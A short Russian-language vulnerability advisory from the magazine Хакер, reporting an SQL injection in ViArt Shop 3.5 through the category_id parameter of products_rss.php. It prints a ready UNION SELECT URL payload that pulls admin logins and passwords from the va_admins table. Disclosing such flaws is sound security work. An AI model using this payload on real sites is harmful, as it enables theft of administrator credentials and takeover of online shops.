SQL-инъекция в ViArt Shop

Рекомендуем почитать:

Хакер #310. Хакеры.RU

Содержание выпуска
Подписка на «Хакер»-60%

Программа: ViArt Shop 3.5

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных сценарием products_rss.php. Удаленный пользователь
может с помощью специально сформированного запроса выполнить произвольные SQL
команды в базе данных приложения.

Эксплоит:

/products_rss.php?category_id=1' UNION SELECT concat(login,char(58),password),0
FROM va_admins -- /*

SQL-инъекция в ViArt Shop

Хакер #310. Хакеры.RU

Подпишись на наc в Telegram!

Из рубрики «Взлом»

ZX-мания. Изучаем современные версии ZX Spectrum

«Пасхалка» в Telegram. Как я нашел способ авторизоваться без клауд-пароля и уведомлений

HTB Administrator. Эксплуатируем цепочку уязвимых ACL для захвата домена

Хакеры.RU. Глава 0х18. Конец файла

Трюки

Телеграмма для дельфина. Управляем Flipper Zero удаленно при помощи Raspberry Pi и Telegram

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Последние новости

Новые NFC-атаки: преступники создают клон собственной карты на Android-устройстве жертвы

Открыт прием заявок на премию для этичных хакеров Pentest award 2025

В Vaultwarden обнаружили уязвимости

Уязвимость SSL.com позволяла получать сертификаты для чужих доменов

Фишеры используют файлы SVG для кражи учетных данных